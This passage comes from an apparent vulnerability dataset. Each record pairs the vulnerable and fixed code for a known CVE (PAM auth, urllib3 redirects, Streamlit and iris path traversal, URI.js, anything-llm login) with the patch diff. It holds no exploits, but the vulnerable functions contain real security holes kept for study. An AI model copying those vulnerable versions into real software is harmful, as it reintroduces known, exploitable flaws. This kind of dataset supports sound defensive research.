"file_path": "internal/auth/pam/pam.go", "start_line": 15, "end_line": 35, "snippet": "func PAMAuth(serviceName, userName, passwd string) error {\n\tt, err := pam.StartFunc(serviceName, userName, func(s pam.Style, msg string) (string, error) {\n\t\tswitch s {\n\t\tcase pam.PromptEchoOff:\n\t\t\treturn passwd, nil\n\t\tcase pam.PromptEchoOn, pam.ErrorMsg, pam.TextInfo:\n\t\t\treturn \"\", nil\n\t\t}\n\t\treturn \"\", errors.New(\"Unrecognized PAM message style\")\n\t})\n\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tif err = t.Authenticate(0); err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_204_1", "commit": "64102be2c90e1b47dbdd379873ba76c80d4b0e78", "file_path": "internal/auth/pam/pam.go", "start_line": 15, "end_line": 35, "snippet": "func PAMAuth(serviceName, userName, passwd string) error {\n\tt, err := pam.StartFunc(serviceName, userName, func(s pam.Style, msg string) (string, error) {\n\t\tswitch s {\n\t\tcase pam.PromptEchoOff:\n\t\t\treturn passwd, nil\n\t\tcase pam.PromptEchoOn, pam.ErrorMsg, pam.TextInfo:\n\t\t\treturn \"\", nil\n\t\t}\n\t\treturn \"\", errors.New(\"Unrecognized PAM message style\")\n\t})\n\n\tif err != nil {\n\t\treturn err\n\t}\n\n\terr = t.Authenticate(0)\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn t.AcctMgmt(0)\n}"}], "vul_patch": "--- a/internal/auth/pam/pam.go\n+++ b/internal/auth/pam/pam.go\n@@ -13,9 +13,9 @@\n \t\treturn err\n \t}\n \n-\tif err = t.Authenticate(0); err != nil {\n+\terr = t.Authenticate(0)\n+\tif err != nil {\n \t\treturn err\n \t}\n-\n-\treturn nil\n+\treturn t.AcctMgmt(0)\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2018-25091", "cve_description": "urllib3 before 1.24.2 does not remove the authorization HTTP header when following a cross-origin redirect (i.e., a redirect that differs in host, port, or scheme). This can allow for credentials in the authorization header to be exposed to unintended hosts or transmitted in cleartext. NOTE: this issue exists because of an incomplete fix for CVE-2018-20060 (which was case-sensitive).", "cwe_info": {"CWE-601": {"name": "URL Redirection to Untrusted Site ('Open Redirect')", "description": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect."}}, "repo": "https://github.com/urllib3/urllib3", "patch_url": ["https://github.com/urllib3/urllib3/commit/adb358f8e06865406d1f05e581a16cbea2136fbc"], "programing_language": "Python", "vul_func": [{"id": "vul_py_391_1", "commit": "adb358f8e06865406d1f05e581a16cbea2136fbc", "file_path": "src/urllib3/poolmanager.py", "start_line": 302, "end_line": 359, "snippet": "\n def urlopen(self, method, url, redirect=True, **kw):\n \"\"\"\n Same as :meth:`urllib3.connectionpool.HTTPConnectionPool.urlopen`\n with custom cross-host redirect logic and only sends the request-uri\n portion of the ``url``.\n\n The given ``url`` parameter must be absolute, such that an appropriate\n :class:`urllib3.connectionpool.ConnectionPool` can be chosen for it.\n \"\"\"\n u = parse_url(url)\n conn = self.connection_from_host(u.host, port=u.port, scheme=u.scheme)\n\n kw['assert_same_host'] = False\n kw['redirect'] = False\n\n if 'headers' not in kw:\n kw['headers'] = self.headers.copy()\n\n if self.proxy is not None and u.scheme == \"http\":\n response = conn.urlopen(method, url, **kw)\n else:\n response = conn.urlopen(method, u.request_uri, **kw)\n\n redirect_location = redirect and response.get_redirect_location()\n if not redirect_location:\n return response\n\n # Support relative URLs for redirecting.\n redirect_location = urljoin(url, redirect_location)\n\n # RFC 7231, Section 6.4.4\n if response.status == 303:\n method = 'GET'\n\n retries = kw.get('retries')\n if not isinstance(retries, Retry):\n retries = Retry.from_int(retries, redirect=redirect)\n\n # Strip headers marked as unsafe to forward to the redirected location.\n # Check remove_headers_on_redirect to avoid a potential network call within\n # conn.is_same_host() which may use socket.gethostbyname() in the future.\n if (retries.remove_headers_on_redirect\n and not conn.is_same_host(redirect_location)):\n headers = list(six.iterkeys(kw['headers']))\n for header in headers:\n if header.lower() in retries.remove_headers_on_redirect:\n kw['headers'].pop(header, None)\n\n try:\n retries = retries.increment(method, url, response=response, _pool=conn)\n except MaxRetryError:\n if retries.raise_on_redirect:\n raise\n return response\n\n kw['retries'] = retries\n kw['redirect'] = redirect"}, {"id": "vul_py_391_2", "commit": "a252e2549ff797fe13e688f05296fa496e0c469a", "file_path": "src/urllib3/util/retry.py", "start_line": 159, "end_line": 182, "snippet": " def __init__(self, total=10, connect=None, read=None, redirect=None, status=None,\n method_whitelist=DEFAULT_METHOD_WHITELIST, status_forcelist=None,\n backoff_factor=0, raise_on_redirect=True, raise_on_status=True,\n history=None, respect_retry_after_header=True,\n remove_headers_on_redirect=DEFAULT_REDIRECT_HEADERS_BLACKLIST):\n\n self.total = total\n self.connect = connect\n self.read = read\n self.status = status\n\n if redirect is False or total is False:\n redirect = 0\n raise_on_redirect = False\n\n self.redirect = redirect\n self.status_forcelist = status_forcelist or set()\n self.method_whitelist = method_whitelist\n self.backoff_factor = backoff_factor\n self.raise_on_redirect = raise_on_redirect\n self.raise_on_status = raise_on_status\n self.history = history or tuple()\n self.respect_retry_after_header = respect_retry_after_header\n self.remove_headers_on_redirect = remove_headers_on_redirect"}], "fix_func": [{"id": "fix_py_391_1", "commit": "a252e2549ff797fe13e688f05296fa496e0c469a", "file_path": "src/urllib3/poolmanager.py", "start_line": 303, "end_line": 362, "snippet": " \"\"\"\n Same as :meth:`urllib3.connectionpool.HTTPConnectionPool.urlopen`\n with custom cross-host redirect logic and only sends the request-uri\n portion of the ``url``.\n\n The given ``url`` parameter must be absolute, such that an appropriate\n :class:`urllib3.connectionpool.ConnectionPool` can be chosen for it.\n \"\"\"\n u = parse_url(url)\n conn = self.connection_from_host(u.host, port=u.port, scheme=u.scheme)\n\n kw['assert_same_host'] = False\n kw['redirect'] = False\n\n if 'headers' not in kw:\n kw['headers'] = self.headers.copy()\n\n if self.proxy is not None and u.scheme == \"http\":\n response = conn.urlopen(method, url, **kw)\n else:\n response = conn.urlopen(method, u.request_uri, **kw)\n\n redirect_location = redirect and response.get_redirect_location()\n if not redirect_location:\n return response\n\n # Support relative URLs for redirecting.\n redirect_location = urljoin(url, redirect_location)\n\n # RFC 7231, Section 6.4.4\n if response.status == 303:\n method = 'GET'\n\n retries = kw.get('retries')\n if not isinstance(retries, Retry):\n retries = Retry.from_int(retries, redirect=redirect)\n\n # Strip headers marked as unsafe to forward to the redirected location.\n # Check remove_headers_on_redirect to avoid a potential network call within\n # conn.is_same_host() which may use socket.gethostbyname() in the future.\n if (retries.remove_headers_on_redirect\n and not conn.is_same_host(redirect_location)):\n for header in retries.remove_headers_on_redirect:\n kw['headers'].pop(header, None)\n\n try:\n retries = retries.increment(method, url, response=response, _pool=conn)\n except MaxRetryError:\n if retries.raise_on_redirect:\n raise\n return response\n\n kw['retries'] = retries\n kw['redirect'] = redirect\n\n log.info(\"Redirecting %s -> %s\", url, redirect_location)\n return self.urlopen(method, redirect_location, **kw)\n\n\nclass ProxyManager(PoolManager):"}, {"id": "fix_py_391_2", "commit": "adb358f8e06865406d1f05e581a16cbea2136fbc", "file_path": "src/urllib3/util/retry.py", "start_line": 159, "end_line": 183, "snippet": " def __init__(self, total=10, connect=None, read=None, redirect=None, status=None,\n method_whitelist=DEFAULT_METHOD_WHITELIST, status_forcelist=None,\n backoff_factor=0, raise_on_redirect=True, raise_on_status=True,\n history=None, respect_retry_after_header=True,\n remove_headers_on_redirect=DEFAULT_REDIRECT_HEADERS_BLACKLIST):\n\n self.total = total\n self.connect = connect\n self.read = read\n self.status = status\n\n if redirect is False or total is False:\n redirect = 0\n raise_on_redirect = False\n\n self.redirect = redirect\n self.status_forcelist = status_forcelist or set()\n self.method_whitelist = method_whitelist\n self.backoff_factor = backoff_factor\n self.raise_on_redirect = raise_on_redirect\n self.raise_on_status = raise_on_status\n self.history = history or tuple()\n self.respect_retry_after_header = respect_retry_after_header\n self.remove_headers_on_redirect = frozenset([\n h.lower() for h in remove_headers_on_redirect])"}], "vul_patch": "--- a/src/urllib3/poolmanager.py\n+++ b/src/urllib3/poolmanager.py\n@@ -1,5 +1,3 @@\n-\n- def urlopen(self, method, url, redirect=True, **kw):\n \"\"\"\n Same as :meth:`urllib3.connectionpool.HTTPConnectionPool.urlopen`\n with custom cross-host redirect logic and only sends the request-uri\n@@ -42,10 +40,8 @@\n # conn.is_same_host() which may use socket.gethostbyname() in the future.\n if (retries.remove_headers_on_redirect\n and not conn.is_same_host(redirect_location)):\n- headers = list(six.iterkeys(kw['headers']))\n- for header in headers:\n- if header.lower() in retries.remove_headers_on_redirect:\n- kw['headers'].pop(header, None)\n+ for header in retries.remove_headers_on_redirect:\n+ kw['headers'].pop(header, None)\n \n try:\n retries = retries.increment(method, url, response=response, _pool=conn)\n@@ -56,3 +52,9 @@\n \n kw['retries'] = retries\n kw['redirect'] = redirect\n+\n+ log.info(\"Redirecting %s -> %s\", url, redirect_location)\n+ return self.urlopen(method, redirect_location, **kw)\n+\n+\n+class ProxyManager(PoolManager):\n\n--- a/src/urllib3/util/retry.py\n+++ b/src/urllib3/util/retry.py\n@@ -21,4 +21,5 @@\n self.raise_on_status = raise_on_status\n self.history = history or tuple()\n self.respect_retry_after_header = respect_retry_after_header\n- self.remove_headers_on_redirect = remove_headers_on_redirect\n+ self.remove_headers_on_redirect = frozenset([\n+ h.lower() for h in remove_headers_on_redirect])\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-35918", "cve_description": "Streamlit is a data oriented application development framework for python. Users hosting Streamlit app(s) that use custom components are vulnerable to a directory traversal attack that could leak data from their web server file-system such as: server logs, world readable files, and potentially other sensitive information. An attacker can craft a malicious URL with file paths and the streamlit server would process that URL and return the contents of that file. This issue has been resolved in version 1.11.1. Users are advised to upgrade. There are no known workarounds for this issue.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/streamlit/streamlit", "patch_url": ["https://github.com/streamlit/streamlit/commit/80d9979d5f4a00217743d607078a1d867fad8acf"], "programing_language": "Python", "vul_func": [{"id": "vul_py_380_1", "commit": "4a04eefe248b9af28ba5b563e54d665f68e49116", "file_path": "lib/streamlit/components/v1/components.py", "start_line": 310, "end_line": 336, "snippet": " def get(self, path: str) -> None:\n parts = path.split(\"/\")\n component_name = parts[0]\n component_root = self._registry.get_component_path(component_name)\n if component_root is None:\n self.write(\"not found\")\n self.set_status(404)\n return\n\n filename = \"/\".join(parts[1:])\n abspath = os.path.join(component_root, filename)\n\n LOGGER.debug(\"ComponentRequestHandler: GET: %s -> %s\", path, abspath)\n\n try:\n with open(abspath, \"rb\") as file:\n contents = file.read()\n except (OSError) as e:\n LOGGER.error(f\"ComponentRequestHandler: GET {path} read error\", exc_info=e)\n self.write(\"read error\")\n self.set_status(404)\n return\n\n self.write(contents)\n self.set_header(\"Content-Type\", self.get_content_type(abspath))\n\n self.set_extra_headers(path)"}], "fix_func": [{"id": "fix_py_380_1", "commit": "80d9979d5f4a00217743d607078a1d867fad8acf", "file_path": "lib/streamlit/components/v1/components.py", "start_line": 310, "end_line": 344, "snippet": " def get(self, path: str) -> None:\n parts = path.split(\"/\")\n component_name = parts[0]\n component_root = self._registry.get_component_path(component_name)\n if component_root is None:\n self.write(\"not found\")\n self.set_status(404)\n return\n\n # follow symlinks to get an accurate normalized path\n component_root = os.path.realpath(component_root)\n filename = \"/\".join(parts[1:])\n abspath = os.path.realpath(os.path.join(component_root, filename))\n\n # Do NOT expose anything outside of the component root.\n if os.path.commonprefix([component_root, abspath]) != component_root:\n self.write(\"forbidden\")\n self.set_status(403)\n return\n\n LOGGER.debug(\"ComponentRequestHandler: GET: %s -> %s\", path, abspath)\n\n try:\n with open(abspath, \"rb\") as file:\n contents = file.read()\n except (OSError) as e:\n LOGGER.error(f\"ComponentRequestHandler: GET {path} read error\", exc_info=e)\n self.write(\"read error\")\n self.set_status(404)\n return\n\n self.write(contents)\n self.set_header(\"Content-Type\", self.get_content_type(abspath))\n\n self.set_extra_headers(path)"}], "vul_patch": "--- a/lib/streamlit/components/v1/components.py\n+++ b/lib/streamlit/components/v1/components.py\n@@ -7,8 +7,16 @@\n self.set_status(404)\n return\n \n+ # follow symlinks to get an accurate normalized path\n+ component_root = os.path.realpath(component_root)\n filename = \"/\".join(parts[1:])\n- abspath = os.path.join(component_root, filename)\n+ abspath = os.path.realpath(os.path.join(component_root, filename))\n+\n+ # Do NOT expose anything outside of the component root.\n+ if os.path.commonprefix([component_root, abspath]) != component_root:\n+ self.write(\"forbidden\")\n+ self.set_status(403)\n+ return\n \n LOGGER.debug(\"ComponentRequestHandler: GET: %s -> %s\", path, abspath)\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-1233", "cve_description": "URL Confusion When Scheme Not Supplied in GitHub repository medialize/uri.js prior to 1.19.11.", "cwe_info": {"CWE-601": {"name": "URL Redirection to Untrusted Site ('Open Redirect')", "description": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect."}}, "repo": "https://github.com/medialize/uri.js", "patch_url": ["https://github.com/medialize/uri.js/commit/88805fd3da03bd7a5e60947adb49d182011f1277"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_107_1", "commit": "926b2aa", "file_path": "src/URI.js", "start_line": 491, "end_line": 553, "snippet": " URI.parse = function(string, parts) {\n var pos;\n if (!parts) {\n parts = {\n preventInvalidHostname: URI.preventInvalidHostname\n };\n }\n\n string = string.replace(URI.leading_whitespace_expression, '')\n\n // [protocol\"://\"[username[\":\"password]\"@\"]hostname[\":\"port]\"/\"?][path][\"?\"querystring][\"#\"fragment]\n\n // extract fragment\n pos = string.indexOf('#');\n if (pos > -1) {\n // escaping?\n parts.fragment = string.substring(pos + 1) || null;\n string = string.substring(0, pos);\n }\n\n // extract query\n pos = string.indexOf('?');\n if (pos > -1) {\n // escaping?\n parts.query = string.substring(pos + 1) || null;\n string = string.substring(0, pos);\n }\n\n // slashes and backslashes have lost all meaning for the web protocols (https, http, wss, ws)\n string = string.replace(/^(https?|ftp|wss?)?:+[/\\\\]*/i, '$1://');\n\n // extract protocol\n if (string.substring(0, 2) === '//') {\n // relative-scheme\n parts.protocol = null;\n string = string.substring(2);\n // extract \"user:pass@host:port\"\n string = URI.parseAuthority(string, parts);\n } else {\n pos = string.indexOf(':');\n if (pos > -1) {\n parts.protocol = string.substring(0, pos) || null;\n if (parts.protocol && !parts.protocol.match(URI.protocol_expression)) {\n // : may be within the path\n parts.protocol = undefined;\n } else if (string.substring(pos + 1, pos + 3).replace(/\\\\/g, '/') === '//') {\n string = string.substring(pos + 3);\n\n // extract \"user:pass@host:port\"\n string = URI.parseAuthority(string, parts);\n } else {\n string = string.substring(pos + 1);\n parts.urn = true;\n }\n }\n }\n\n // what's left must be the path\n parts.path = string;\n\n // and we're done\n return parts;\n };"}], "fix_func": [{"id": "fix_js_107_1", "commit": "88805fd", "file_path": "src/URI.js", "start_line": 491, "end_line": 555, "snippet": " URI.parse = function(string, parts) {\n var pos;\n if (!parts) {\n parts = {\n preventInvalidHostname: URI.preventInvalidHostname\n };\n }\n\n string = string.replace(URI.leading_whitespace_expression, '')\n\n // [protocol\"://\"[username[\":\"password]\"@\"]hostname[\":\"port]\"/\"?][path][\"?\"querystring][\"#\"fragment]\n\n // extract fragment\n pos = string.indexOf('#');\n if (pos > -1) {\n // escaping?\n parts.fragment = string.substring(pos + 1) || null;\n string = string.substring(0, pos);\n }\n\n // extract query\n pos = string.indexOf('?');\n if (pos > -1) {\n // escaping?\n parts.query = string.substring(pos + 1) || null;\n string = string.substring(0, pos);\n }\n\n // slashes and backslashes have lost all meaning for the web protocols (https, http, wss, ws)\n string = string.replace(/^(https?|ftp|wss?)?:+[/\\\\]*/i, '$1://');\n // slashes and backslashes have lost all meaning for scheme relative URLs\n string = string.replace(/^[/\\\\]{2,}/i, '//');\n\n // extract protocol\n if (string.substring(0, 2) === '//') {\n // relative-scheme\n parts.protocol = null;\n string = string.substring(2);\n // extract \"user:pass@host:port\"\n string = URI.parseAuthority(string, parts);\n } else {\n pos = string.indexOf(':');\n if (pos > -1) {\n parts.protocol = string.substring(0, pos) || null;\n if (parts.protocol && !parts.protocol.match(URI.protocol_expression)) {\n // : may be within the path\n parts.protocol = undefined;\n } else if (string.substring(pos + 1, pos + 3).replace(/\\\\/g, '/') === '//') {\n string = string.substring(pos + 3);\n\n // extract \"user:pass@host:port\"\n string = URI.parseAuthority(string, parts);\n } else {\n string = string.substring(pos + 1);\n parts.urn = true;\n }\n }\n }\n\n // what's left must be the path\n parts.path = string;\n\n // and we're done\n return parts;\n };"}], "vul_patch": "--- a/src/URI.js\n+++ b/src/URI.js\n@@ -28,6 +28,8 @@\n \n // slashes and backslashes have lost all meaning for the web protocols (https, http, wss, ws)\n string = string.replace(/^(https?|ftp|wss?)?:+[/\\\\]*/i, '$1://');\n+ // slashes and backslashes have lost all meaning for scheme relative URLs\n+ string = string.replace(/^[/\\\\]{2,}/i, '//');\n \n // extract protocol\n if (string.substring(0, 2) === '//') {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-3102", "cve_description": "A JSON Injection vulnerability exists in the `mintplex-labs/anything-llm` application, specifically within the username parameter during the login process at the `/api/request-token` endpoint. The vulnerability arises from improper handling of values, allowing attackers to perform brute force attacks without prior knowledge of the username. Once the password is known, attackers can conduct blind attacks to ascertain the full username, significantly compromising system security.", "cwe_info": {"CWE-307": {"name": "Improper Restriction of Excessive Authentication Attempts", "description": "The product does not implement sufficient measures to prevent multiple failed authentication attempts within a short time frame."}}, "repo": "https://github.com/mintplex-labs/anything-llm", "patch_url": ["https://github.com/mintplex-labs/anything-llm/commit/2374939ffb551ab2929d7f9d5827fe6597fa8caa"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_93_1", "commit": "52fac84", "file_path": "server/endpoints/system.js", "start_line": "102", "end_line": "224", "snippet": " app.post(\"/request-token\", async (request, response) => {\n try {\n const bcrypt = require(\"bcrypt\");\n\n if (await SystemSettings.isMultiUserMode()) {\n const { username, password } = reqBody(request);\n const existingUser = await User.get({ username });\n\n if (!existingUser) {\n await EventLogs.logEvent(\n \"failed_login_invalid_username\",\n {\n ip: request.ip || \"Unknown IP\",\n username: username || \"Unknown user\",\n },\n existingUser?.id\n );\n response.status(200).json({\n user: null,\n valid: false,\n token: null,\n message: \"[001] Invalid login credentials.\",\n });\n return;\n }\n\n if (!bcrypt.compareSync(password, existingUser.password)) {\n await EventLogs.logEvent(\n \"failed_login_invalid_password\",\n {\n ip: request.ip || \"Unknown IP\",\n username: username || \"Unknown user\",\n },\n existingUser?.id\n );\n response.status(200).json({\n user: null,\n valid: false,\n token: null,\n message: \"[002] Invalid login credentials.\",\n });\n return;\n }\n\n if (existingUser.suspended) {\n await EventLogs.logEvent(\n \"failed_login_account_suspended\",\n {\n ip: request.ip || \"Unknown IP\",\n username: username || \"Unknown user\",\n },\n existingUser?.id\n );\n response.status(200).json({\n user: null,\n valid: false,\n token: null,\n message: \"[004] Account suspended by admin.\",\n });\n return;\n }\n\n await Telemetry.sendTelemetry(\n \"login_event\",\n { multiUserMode: false },\n existingUser?.id\n );\n\n await EventLogs.logEvent(\n \"login_event\",\n {\n ip: request.ip || \"Unknown IP\",\n username: existingUser.username || \"Unknown user\",\n },\n existingUser?.id\n );\n\n response.status(200).json({\n valid: true,\n user: existingUser,\n token: makeJWT(\n { id: existingUser.id, username: existingUser.username },\n \"30d\"\n ),\n message: null,\n });\n return;\n } else {\n const { password } = reqBody(request);\n if (\n !bcrypt.compareSync(\n password,\n bcrypt.hashSync(process.env.AUTH_TOKEN, 10)\n )\n ) {\n await EventLogs.logEvent(\"failed_login_invalid_password\", {\n ip: request.ip || \"Unknown IP\",\n multiUserMode: false,\n });\n response.status(401).json({\n valid: false,\n token: null,\n message: \"[003] Invalid password provided\",\n });\n return;\n }\n\n await Telemetry.sendTelemetry(\"login_event\", { multiUserMode: false });\n await EventLogs.logEvent(\"login_event\", {\n ip: request.ip || \"Unknown IP\",\n multiUserMode: false,\n });\n response.status(200).json({\n valid: true,\n token: makeJWT({ p: password }, \"30d\"),\n message: null,\n });\n }\n } catch (e) {\n console.log(e.message, e);\n response.sendStatus(500).end();\n }\n });"}], "fix_func": [{"id": "fix_js_93_1", "commit": "2374939", "file_path": "server/endpoints/system.js", "start_line": "102", "end_line": "224", "snippet": " app.post(\"/request-token\", async (request, response) => {\n try {\n const bcrypt = require(\"bcrypt\");\n\n if (await SystemSettings.isMultiUserMode()) {\n const { username, password } = reqBody(request);\n const existingUser = await User.get({ username: String(username) });\n\n if (!existingUser) {\n await EventLogs.logEvent(\n \"failed_login_invalid_username\",\n {\n ip: request.ip || \"Unknown IP\",\n username: username || \"Unknown user\",\n },\n existingUser?.id\n );\n response.status(200).json({\n user: null,\n valid: false,\n token: null,\n message: \"[001] Invalid login credentials.\",\n });\n return;\n }\n\n if (!bcrypt.compareSync(String(password), existingUser.password)) {\n await EventLogs.logEvent(\n \"failed_login_invalid_password\",\n {\n ip: request.ip || \"Unknown IP\",\n username: username || \"Unknown user\",\n },\n existingUser?.id\n );\n response.status(200).json({\n user: null,\n valid: false,\n token: null,\n message: \"[002] Invalid login credentials.\",\n });\n return;\n }\n\n if (existingUser.suspended) {\n await EventLogs.logEvent(\n \"failed_login_account_suspended\",\n {\n ip: request.ip || \"Unknown IP\",\n username: username || \"Unknown user\",\n },\n existingUser?.id\n );\n response.status(200).json({\n user: null,\n valid: false,\n token: null,\n message: \"[004] Account suspended by admin.\",\n });\n return;\n }\n\n await Telemetry.sendTelemetry(\n \"login_event\",\n { multiUserMode: false },\n existingUser?.id\n );\n\n await EventLogs.logEvent(\n \"login_event\",\n {\n ip: request.ip || \"Unknown IP\",\n username: existingUser.username || \"Unknown user\",\n },\n existingUser?.id\n );\n\n response.status(200).json({\n valid: true,\n user: existingUser,\n token: makeJWT(\n { id: existingUser.id, username: existingUser.username },\n \"30d\"\n ),\n message: null,\n });\n return;\n } else {\n const { password } = reqBody(request);\n if (\n !bcrypt.compareSync(\n password,\n bcrypt.hashSync(process.env.AUTH_TOKEN, 10)\n )\n ) {\n await EventLogs.logEvent(\"failed_login_invalid_password\", {\n ip: request.ip || \"Unknown IP\",\n multiUserMode: false,\n });\n response.status(401).json({\n valid: false,\n token: null,\n message: \"[003] Invalid password provided\",\n });\n return;\n }\n\n await Telemetry.sendTelemetry(\"login_event\", { multiUserMode: false });\n await EventLogs.logEvent(\"login_event\", {\n ip: request.ip || \"Unknown IP\",\n multiUserMode: false,\n });\n response.status(200).json({\n valid: true,\n token: makeJWT({ p: password }, \"30d\"),\n message: null,\n });\n }\n } catch (e) {\n console.log(e.message, e);\n response.sendStatus(500).end();\n }\n });"}], "vul_patch": "--- a/server/endpoints/system.js\n+++ b/server/endpoints/system.js\n@@ -4,7 +4,7 @@\n \n if (await SystemSettings.isMultiUserMode()) {\n const { username, password } = reqBody(request);\n- const existingUser = await User.get({ username });\n+ const existingUser = await User.get({ username: String(username) });\n \n if (!existingUser) {\n await EventLogs.logEvent(\n@@ -24,7 +24,7 @@\n return;\n }\n \n- if (!bcrypt.compareSync(password, existingUser.password)) {\n+ if (!bcrypt.compareSync(String(password), existingUser.password)) {\n await EventLogs.logEvent(\n \"failed_login_invalid_password\",\n {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-23772", "cve_description": "This affects all versions of package github.com/kataras/iris; all versions of package github.com/kataras/iris/v12. The unsafe handling of file names during upload using UploadFormFiles method may enable attackers to write to arbitrary locations outside the designated target folder.", "cwe_info": {"CWE-59": {"name": "Improper Link Resolution Before File Access ('Link Following')", "description": "The product attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource."}}, "repo": "https://github.com/kataras/iris", "patch_url": ["https://github.com/kataras/iris/commit/e213dba0d32ff66653e0ef124bc5088817264b08"], "programing_language": "Go", "vul_func": [{"id": "vul_go_272_1", "commit": "25ad31be505a70189af6bb22804ad559d3dc6df6", "file_path": "context/context.go", "start_line": 2021, "end_line": 2063, "snippet": "func (ctx *Context) FormFiles(key string, before ...func(*Context, *multipart.FileHeader) bool) (files []multipart.File, headers []*multipart.FileHeader, err error) {\n\terr = ctx.request.ParseMultipartForm(ctx.app.ConfigurationReadOnly().GetPostMaxMemory())\n\tif err != nil {\n\t\treturn\n\t}\n\n\tif ctx.request.MultipartForm != nil {\n\t\tfhs := ctx.request.MultipartForm.File\n\t\tif n := len(fhs); n > 0 {\n\t\t\tfiles = make([]multipart.File, 0, n)\n\t\t\theaders = make([]*multipart.FileHeader, 0, n)\n\n\t\tinnerLoop:\n\t\t\tfor _, header := range fhs[key] {\n\t\t\t\t// Fix an issue that net/http has,\n\t\t\t\t// an attacker can push a filename\n\t\t\t\t// which could lead to override existing system files\n\t\t\t\t// by ../../$header.\n\t\t\t\t// Reported by Frank through security reports.\n\t\t\t\theader.Filename = strings.ReplaceAll(header.Filename, \"../\", \"\")\n\t\t\t\theader.Filename = strings.ReplaceAll(header.Filename, \"..\\\\\", \"\")\n\n\t\t\t\tfor _, b := range before {\n\t\t\t\t\tif !b(ctx, header) {\n\t\t\t\t\t\tcontinue innerLoop\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\tfile, fErr := header.Open()\n\t\t\t\tif fErr != nil { // exit on first error but return the succeed.\n\t\t\t\t\treturn files, headers, fErr\n\t\t\t\t}\n\n\t\t\t\tfiles = append(files, file)\n\t\t\t\theaders = append(headers, header)\n\t\t\t}\n\t\t}\n\n\t\treturn\n\t}\n\n\treturn nil, nil, http.ErrMissingFile\n}"}, {"id": "vul_go_272_2", "commit": "25ad31be505a70189af6bb22804ad559d3dc6df6", "file_path": "context/context.go", "start_line": 2092, "end_line": 2131, "snippet": "func (ctx *Context) UploadFormFiles(destDirectory string, before ...func(*Context, *multipart.FileHeader) bool) (uploaded []*multipart.FileHeader, n int64, err error) {\n\terr = ctx.request.ParseMultipartForm(ctx.app.ConfigurationReadOnly().GetPostMaxMemory())\n\tif err != nil {\n\t\treturn nil, 0, err\n\t}\n\n\tif ctx.request.MultipartForm != nil {\n\t\tif fhs := ctx.request.MultipartForm.File; fhs != nil {\n\t\t\tfor _, files := range fhs {\n\t\t\tinnerLoop:\n\t\t\t\tfor _, file := range files {\n\t\t\t\t\t// Fix an issue that net/http has,\n\t\t\t\t\t// an attacker can push a filename\n\t\t\t\t\t// which could lead to override existing system files\n\t\t\t\t\t// by ../../$file.\n\t\t\t\t\t// Reported by Frank through security reports.\n\t\t\t\t\tfile.Filename = strings.ReplaceAll(file.Filename, \"../\", \"\")\n\t\t\t\t\tfile.Filename = strings.ReplaceAll(file.Filename, \"..\\\\\", \"\")\n\n\t\t\t\t\tfor _, b := range before {\n\t\t\t\t\t\tif !b(ctx, file) {\n\t\t\t\t\t\t\tcontinue innerLoop\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\n\t\t\t\t\tn0, err0 := ctx.SaveFormFile(file, filepath.Join(destDirectory, file.Filename))\n\t\t\t\t\tif err0 != nil {\n\t\t\t\t\t\treturn nil, 0, err0\n\t\t\t\t\t}\n\t\t\t\t\tn += n0\n\n\t\t\t\t\tuploaded = append(uploaded, file)\n\t\t\t\t}\n\t\t\t}\n\t\t\treturn uploaded, n, nil\n\t\t}\n\t}\n\n\treturn nil, 0, http.ErrMissingFile\n}"}], "fix_func": [{"id": "fix_go_272_1", "commit": "e213dba0d32ff66653e0ef124bc5088817264b08", "file_path": "context/context.go", "start_line": 2021, "end_line": 2057, "snippet": "func (ctx *Context) FormFiles(key string, before ...func(*Context, *multipart.FileHeader) bool) (files []multipart.File, headers []*multipart.FileHeader, err error) {\n\terr = ctx.request.ParseMultipartForm(ctx.app.ConfigurationReadOnly().GetPostMaxMemory())\n\tif err != nil {\n\t\treturn\n\t}\n\n\tif ctx.request.MultipartForm != nil {\n\t\tfhs := ctx.request.MultipartForm.File\n\t\tif n := len(fhs); n > 0 {\n\t\t\tfiles = make([]multipart.File, 0, n)\n\t\t\theaders = make([]*multipart.FileHeader, 0, n)\n\n\t\tinnerLoop:\n\t\t\tfor _, header := range fhs[key] {\n\t\t\t\theader.Filename = filepath.Base(header.Filename)\n\n\t\t\t\tfor _, b := range before {\n\t\t\t\t\tif !b(ctx, header) {\n\t\t\t\t\t\tcontinue innerLoop\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\tfile, fErr := header.Open()\n\t\t\t\tif fErr != nil { // exit on first error but return the succeed.\n\t\t\t\t\treturn files, headers, fErr\n\t\t\t\t}\n\n\t\t\t\tfiles = append(files, file)\n\t\t\t\theaders = append(headers, header)\n\t\t\t}\n\t\t}\n\n\t\treturn\n\t}\n\n\treturn nil, nil, http.ErrMissingFile\n}"}, {"id": "fix_go_272_2", "commit": "e213dba0d32ff66653e0ef124bc5088817264b08", "file_path": "context/context.go", "start_line": 2086, "end_line": 2121, "snippet": "func (ctx *Context) UploadFormFiles(destDirectory string, before ...func(*Context, *multipart.FileHeader) bool) (uploaded []*multipart.FileHeader, n int64, err error) {\n\terr = ctx.request.ParseMultipartForm(ctx.app.ConfigurationReadOnly().GetPostMaxMemory())\n\tif err != nil {\n\t\treturn nil, 0, 